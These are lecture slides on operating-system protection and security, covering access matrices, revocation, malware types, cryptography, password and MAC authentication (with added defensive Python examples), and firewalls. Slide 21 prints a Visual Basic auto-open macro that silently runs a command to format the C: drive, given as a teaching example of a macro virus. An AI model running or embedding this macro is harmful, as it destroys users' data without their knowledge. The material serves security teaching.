Lecture 8: protection and security


1 Lecture 8: protection and security
Dr. Nermin Hamza

2 Protection

3 Protection
Protection refers to mechanisms for controlling the access of programs, processes, or users to the resources defined by a computer system. Modern protection concepts have evolved to increase the reliability of any complex system that makes use of shared resources. A key principle for protection is the principle of least privilege.

4 Domain of Protection
A computer system is a collection of processes and objects. By objects, we mean both hardware objects (such as the CPU, memory segments, printers, disks, and tape drives) and software objects (such as files, programs, and semaphores). Each process operates within a protection domain, which specifies the resources that the process may access. The ability to execute an operation on an object is an access right. A domain is a collection of access rights, each of which is an ordered pair <object-name, rights-set>.

5 Domain

6 Domain
A domain can be realized in a variety of ways:
Each user may be a domain. In this case, the set of objects that can be accessed depends on the identity of the user.
Each process may be a domain. In this case, the set of objects that can be accessed depends on the identity of the process.
Each procedure may be a domain. In this case, the set of objects that can be accessed corresponds to the local variables defined within the procedure.

7 Access Matrix
View protection as a matrix (the access matrix). Rows represent domains and columns represent objects. Access(i, j) is the set of operations that a process executing in Domain i can invoke on Object j.

8 Access Matrix

9 Use of Access Matrix
The access-matrix design separates mechanism from policy.
Mechanism: the operating system provides the access matrix plus rules. It ensures that the matrix is manipulated only by authorized agents and that the rules are strictly enforced.
Policy: the user dictates policy, i.e. who can access what object and in what mode.

10 Implementation of Access Matrix
Each column = access-control list (ACL) for one object. It defines who can perform what operation, e.g. Domain 1 = Read, Write; Domain 2 = Read; Domain 3 = Read.
Each row = capability list (like a key). For each domain, it lists what operations are allowed on what objects, e.g. Object 1 – Read; Object 4 – Read, Write, Execute; Object 5 – Read, Write, Delete, Copy.

11 Access Matrix with Copy Rights

12 Access Matrix With Owner Rights

13 Revocation of Access Rights
In a dynamic protection system, we may sometimes need to revoke access rights to objects shared by different users.
Access list – delete the access rights from the access list. Simple and immediate: with an access-list scheme, revocation is easy. The access list is searched for any access rights to be revoked, and they are deleted from the list.

14 Revocation of Access Rights
Capability list – a scheme is required to locate the capability in the system before it can be revoked. Possible schemes: reacquisition, back-pointers, indirection, keys.

15 Security

16 The Security Problem
Security must consider the external environment of the system and protect the system's resources. Intruders (crackers) attempt to breach security. A threat is a potential security violation; an attack is an attempt to breach security. An attack can be accidental or malicious. It is easier to protect against accidental than against malicious misuse.

17 Security Attack
Threats mean anything that can interrupt the operation, functioning, integrity, or availability of a network or system; these can take many forms.
Vulnerabilities are inherent weaknesses in the design, configuration, implementation, or management of the network or system that render it susceptible to threats.
Attacks are specific techniques used to exploit the vulnerabilities.

18 Security Violations
Categories: breach of confidentiality, breach of integrity, breach of availability, theft of service, denial of service.
Methods: masquerading (breach of authentication), replay attack, message modification, man-in-the-middle attack, session hijacking.

19 Standard Security Attacks

20 Security Measure Levels
Security must occur at four levels to be effective: physical; human (avoid social engineering, phishing); operating system; network. Security is only as strong as the weakest link in the chain.

21 Program Threats (Cont.)
Viruses: a code fragment embedded in a legitimate program. Very specific to CPU architecture, operating system, and applications. Usually borne via or as a macro.
Visual Basic macro to reformat the hard drive:
Sub AutoOpen()
Dim oFS
Set oFS = CreateObject("Scripting.FileSystemObject")
vs = Shell("c:command.com /k format c:", vbHide)
End Sub

22 Program Threats (Cont.)
A virus dropper inserts the virus onto the system. There are many categories of viruses, and literally many thousands of viruses: file, boot, macro, source code, polymorphic, encrypted, stealth, tunneling, multipartite, armored.

23 A Boot-sector Computer Virus

24 The Morris Internet Worm

25 Trojan Horse: Definition
A Trojan horse is a malicious program that is disguised as legitimate software. Like the gift horse left outside the gates of Troy by the Greeks, Trojan horses appear to be useful or interesting to an unsuspecting user, but are actually harmful.

26 Virus or Worm?
Trojan horse programs cannot replicate themselves, in contrast to some other types of malware, like viruses or worms. A Trojan horse can be deliberately attached to otherwise useful software by a cracker, or it can be spread by tricking users into believing that it is a useful program.

27 Cryptography as a Security Tool
The broadest security tool available. Without cryptography, the source and destination of messages cannot be trusted. Cryptography provides a means to constrain the potential senders (sources) and/or receivers (destinations) of messages, and it is based on secrets (keys).

28 Secure Communication over Insecure Medium

29 Some Basic Terminology
plaintext - the original message
ciphertext - the coded message
cipher - the algorithm for transforming plaintext to ciphertext
key - information used in the cipher, known only to sender/receiver
encipher (encrypt) - converting plaintext to ciphertext
decipher (decrypt) - recovering plaintext from ciphertext

30 Encryption Diagram
(Figure: plaintext → encryption algorithm (key) → ciphertext → decryption algorithm (key) → plaintext.)

31 Cryptography types: symmetric cipher and asymmetric cipher.

32 Symmetric Cryptography
Also called Secret Key Cryptography (SKC): uses a single key for both encryption and decryption. (Figure: plaintext → ciphertext → plaintext, with the same key at both ends.)

33 Asymmetric Cryptography
Also called Public Key Cryptography (PKC): uses one key for encryption and another for decryption. (Figure: plaintext → ciphertext → plaintext, with a different key at each end.)

34 Security Services
Authentication: concerned with assuring that a communication is authentic.
Confidentiality: preventing sensitive information from reaching unauthorized users.
Integrity: preventing the information from modification by unauthorized users.
Availability: assuring that authorized users have timely access to the information in the system and to the network.
Access control: the ability to limit and control access to host systems and applications via communication links.
Non-repudiation: preventing either sender or receiver from denying a transmitted message.

35 User Authentication
It is crucial to identify the user correctly, as protection systems depend on the user ID. User identity is most often established through passwords, which can be considered a special case of either keys or capabilities. Authentication can also include something the user has and/or a user attribute. Passwords must be kept secret: change passwords frequently, use "non-guessable" passwords, and log all invalid access attempts. Passwords may also be encrypted or allowed to be used only once.
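A worked example of the password advice on slide 35, added to this transcript (not the lecture's own code): passwords are stored only as salted, iterated hashes, the comparison is constant-time, and every invalid attempt is written to an audit log. The lockout threshold, the iteration count and the user/password values are constructed assumptions for the example.

```python
import hashlib
import hmac
import os
from datetime import datetime, timezone

ITERATIONS = 100_000          # PBKDF2 work factor (assumed value; raise as hardware allows)
DUMMY_SALT = b"\x00" * 16     # used to burn equal work for unknown users


def make_password_record(password: str) -> dict:
    """Store a per-user random salt and an iterated hash, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return {"salt": salt, "digest": digest, "iterations": ITERATIONS}


def verify_password(record: dict, password: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["digest"])


class Authenticator:
    """Password store plus an audit log of every invalid attempt (the lecture's
    advice); the lockout threshold is an assumption added for this example."""

    def __init__(self, max_failures: int = 3):
        self._records = {}
        self._failures = {}
        self.audit_log = []
        self.max_failures = max_failures

    def register(self, user: str, password: str) -> None:
        self._records[user] = make_password_record(password)

    def login(self, user: str, password: str, source: str = "constructed-client") -> bool:
        record = self._records.get(user)
        locked = self._failures.get(user, 0) >= self.max_failures
        if record is None:
            # Unknown user: do the same amount of work so the response time
            # does not reveal which user names exist.
            hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), DUMMY_SALT, ITERATIONS)
            ok = False
        elif locked:
            ok = False
        else:
            ok = verify_password(record, password)
        if ok:
            self._failures[user] = 0
        else:
            self._failures[user] = self._failures.get(user, 0) + 1
            stamp = datetime.now(timezone.utc).isoformat(timespec="seconds")
            self.audit_log.append(
                f"{stamp} INVALID login user={user!r} src={source} locked={locked}")
        return ok


if __name__ == "__main__":
    auth = Authenticator()
    auth.register("alice", "correct horse battery staple")
    print(auth.login("alice", "guess1"), auth.login("alice", "correct horse battery staple"))
    print("\n".join(auth.audit_log))
```

The salt defeats precomputed tables, the iteration count slows offline guessing against a stolen record, and the log is what lets an operator notice the guessing the lecture warns about.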

36 Authentication – Hash Functions
The basis of authentication. A hash function creates a small, fixed-size block of data (message digest, hash value) from a message m. The hash function H must be collision resistant on m: it must be infeasible to find an m' ≠ m such that H(m) = H(m'). If H(m) = H(m'), then m = m', i.e. the message has not been modified. Common message-digest functions include MD5, which produces a 128-bit hash, and SHA-1, which outputs a 160-bit hash.

37 Authentication – MAC
Symmetric encryption is used in the message-authentication code (MAC) authentication algorithm. Simple example: the MAC defines S(k)(m) = f(k, H(m)), where f is a function that is one-way on its first argument, so k cannot be derived from f(k, H(m)). Because of the collision resistance of the hash function, we are reasonably assured that no other message could create the same MAC. A suitable verification algorithm is V(k)(m, a) ≡ (f(k, H(m)) = a). Note that k is needed to compute both S(k) and V(k), so anyone able to compute one can compute the other.
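Slides 36 and 37 in running code, as an example added to this transcript (not the lecture's own): H is SHA-256 rather than the MD5 or SHA-1 named on slide 36, because collisions for both of those are practical today, and f is HMAC, which is one-way in its key. The key and messages are constructed sample values. The demo also shows why a bare digest is not an authenticator: without a secret, whoever changes m can simply recompute H(m').

```python
import hashlib
import hmac


def H(m: bytes) -> bytes:
    """Message digest: a fixed-size 32-byte block from a message of any length."""
    return hashlib.sha256(m).digest()


def S(k: bytes, m: bytes) -> bytes:
    """S(k)(m) = f(k, H(m)), with f = HMAC-SHA256 (one-way on its first argument)."""
    return hmac.new(k, H(m), hashlib.sha256).digest()


def V(k: bytes, m: bytes, a: bytes) -> bool:
    """V(k)(m, a) ≡ (f(k, H(m)) = a); compare_digest avoids timing leaks."""
    return hmac.compare_digest(S(k, m), a)


def rewrite_digest(m_prime: bytes) -> bytes:
    """What an adversary with no key can do to an unkeyed digest: recompute it."""
    return H(m_prime)


def demo() -> dict:
    key = b"constructed-shared-key"          # in practice: os.urandom(32), shared out-of-band
    m = b"transfer 100 to alice"             # constructed sample message
    a = S(key, m)
    m_prime = b"transfer 900 to alice"       # a modified message

    return {
        # the genuine pair verifies
        "genuine": V(key, m, a),
        # modifying the message without the key breaks verification
        "tampered_same_tag": V(key, m_prime, a),
        # an unkeyed digest offers no protection: the attacker recomputes it
        "digest_rewritten_passes": H(m_prime) == rewrite_digest(m_prime),
        # a MAC computed under a guessed key does not verify under the real one
        "mac_under_guessed_key": V(key, m_prime, S(b"guessed-key", m_prime)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Because the same k is used by S and V, this gives integrity and origin assurance between two parties that already share the key, but not non-repudiation: either party could have produced the tag, which is exactly the gap the digital signature on the next slide closes.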

38 Authentication – Digital Signature
Based on asymmetric keys and a digital-signature algorithm; the authenticators produced are digital signatures. In a digital-signature algorithm it is computationally infeasible to derive S(ks) from V(kv): V is a one-way function. Thus kv is the public key and ks is the private key.
Consider the RSA digital-signature algorithm. It is similar to the RSA encryption algorithm, but the key use is reversed. The digital signature of message m is S(ks)(m) = H(m)^ks mod N. The key ks is again a pair <d, N>, where N is the product of two large, randomly chosen prime numbers p and q. The verification algorithm is V(kv)(m, a) ≡ (a^kv mod N = H(m)), where kv satisfies kv·ks mod (p − 1)(q − 1) = 1.

39 Authentication (Cont.)
Why authentication if it is a subset of encryption? Fewer computations (except for RSA digital signatures); the authenticator is usually shorter than the message; sometimes we want authentication but not confidentiality (signed patches et al.); it can be the basis for non-repudiation.

40 Key Distribution
Delivery of a symmetric key is a huge challenge; it is sometimes done out-of-band. Asymmetric keys can proliferate and are stored on a key ring. Even asymmetric key distribution needs care, because of the man-in-the-middle attack.

41 What is a Firewall?
A choke point of control and monitoring. It interconnects networks with differing trust and imposes restrictions on network services: only authorized traffic is allowed. It supports auditing and controlling access, and can implement alarms for abnormal behavior. It is itself immune to penetration and provides perimeter defence.

42 Firewalls
By conventional definition, a firewall is a partition made of fireproof material designed to prevent the spread of fire from one part of a building to another. A network firewall isolates an organization's internal net from the larger Internet, allowing some packets to pass and blocking others. (Figure: the Internet on one side of the firewall, the privately administered network 222.22/16 on the other.)

43 Advantages and disadvantages of traditional packet filters
Advantages: one screening router can protect an entire network; it can be efficient if the filtering rules are kept simple; it is widely available (almost any router, even Linux boxes).
Disadvantages: it can possibly be penetrated; it cannot enforce some policies, for example permitting certain users; rules can get complicated and difficult to test.

44 Firewall goals
All traffic from outside to inside and vice versa passes through the firewall. Only authorized traffic, as defined by the local security policy, will be allowed to pass. The firewall itself is immune to penetration.

45 Firewalling to Protect Systems and Networks
A network firewall is placed between trusted and untrusted hosts and limits network access between these two security domains. It can be tunneled or spoofed: tunneling allows a disallowed protocol to travel within an allowed protocol (e.g. telnet inside HTTP), and firewall rules are typically based on host name or IP address, which can be spoofed. A personal firewall is a software layer on a given host that can monitor/limit traffic to and from the host. An application proxy firewall understands application protocols and can control them (e.g. SMTP). A system-call firewall monitors all important system calls and applies rules to them (e.g. this program can execute that system call).

